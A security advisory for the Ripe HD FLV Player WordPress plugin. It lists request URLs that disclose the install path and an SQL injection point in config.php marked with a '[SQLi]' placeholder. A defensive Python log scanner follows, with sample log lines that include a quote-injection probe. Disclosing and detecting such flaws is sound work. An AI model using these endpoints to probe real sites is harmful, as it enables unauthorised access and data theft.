Ripe HD FLV Player Plugin for WordPress Multiple Script Direct Request Path Disclosure Vulnerability
Summary
Credit:
The information has been provided by Zikou-16.
Details
Vulnerable Systems:
* Ripe HD FLV Player Plugin for WordPress
Ripe HD FLV Player Plugin for WordPress contains a flaw that may lead to unauthorized information disclosure. The issue is triggered when a remote attacker sends a direct request for the index.php and installer.php scripts, which discloses the software’s installation path, resulting in a loss of confidentiality. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.
#=> Exploit :
------
1#=> Full Path Disclosure :
http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php
http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php
------
2#=> SQL Injection
http://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=[SQLi]
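For defenders, one way to spot requests matching the URLs above in web server access logs, as an added example that is not part of the original advisory. It assumes combined log format and that a legitimate `id` value is a plain integer; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Plugin directory and scripts named in the advisory.
PLUGIN_DIR = "/wp-content/plugins/ripe-hd-player/"
PATH_DISCLOSURE_SCRIPTS = {"index.php", "installer.php"}
SQLI_SCRIPT = "config.php"

# Minimal combined-log-format matcher: client address and request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')

def classify(line):
    """Return (client, finding) for a log line that hits the plugin, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    path = parts.path.lower()
    idx = path.find(PLUGIN_DIR)
    if idx == -1:
        return None
    script = path[idx + len(PLUGIN_DIR):]
    if script in PATH_DISCLOSURE_SCRIPTS:
        return client, "direct-request:" + script
    if script == SQLI_SCRIPT:
        # parse_qs percent-decodes values before the check.
        ids = parse_qs(parts.query, keep_blank_values=True).get("id", [])
        # Assumption: a legitimate id is a plain integer; anything else is flagged.
        if any(not re.fullmatch(r"[0-9]+", v) for v in ids):
            return client, "non-numeric-id:" + script
    return None

def scan(lines):
    """Collect findings for every matching line, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (not from a real server).
P = "/blog/wp-content/plugins/ripe-hd-player/"
SAMPLE = [
    '203.0.113.5 - - [19/Jan/2013:10:00:01 +0000] "GET ' + P + 'index.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [19/Jan/2013:10:00:02 +0000] "GET ' + P + 'installer.php HTTP/1.1" 200 498',
    '192.0.2.44 - - [19/Jan/2013:10:01:10 +0000] "GET ' + P + 'config.php?id=7 HTTP/1.1" 200 930',
    '198.51.100.9 - - [19/Jan/2013:10:02:30 +0000] "GET ' + P + 'config.php?id=7%27 HTTP/1.1" 200 120',
    '192.0.2.44 - - [19/Jan/2013:10:03:00 +0000] "GET /blog/index.php HTTP/1.1" 200 8012',
]

if __name__ == "__main__":
    for client, finding in scan(SAMPLE):
        print(client, finding)
```
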
Disclosure Timeline:
Disclosure Date: 2013-01-19
Exploit Publish Date: 2013-01-19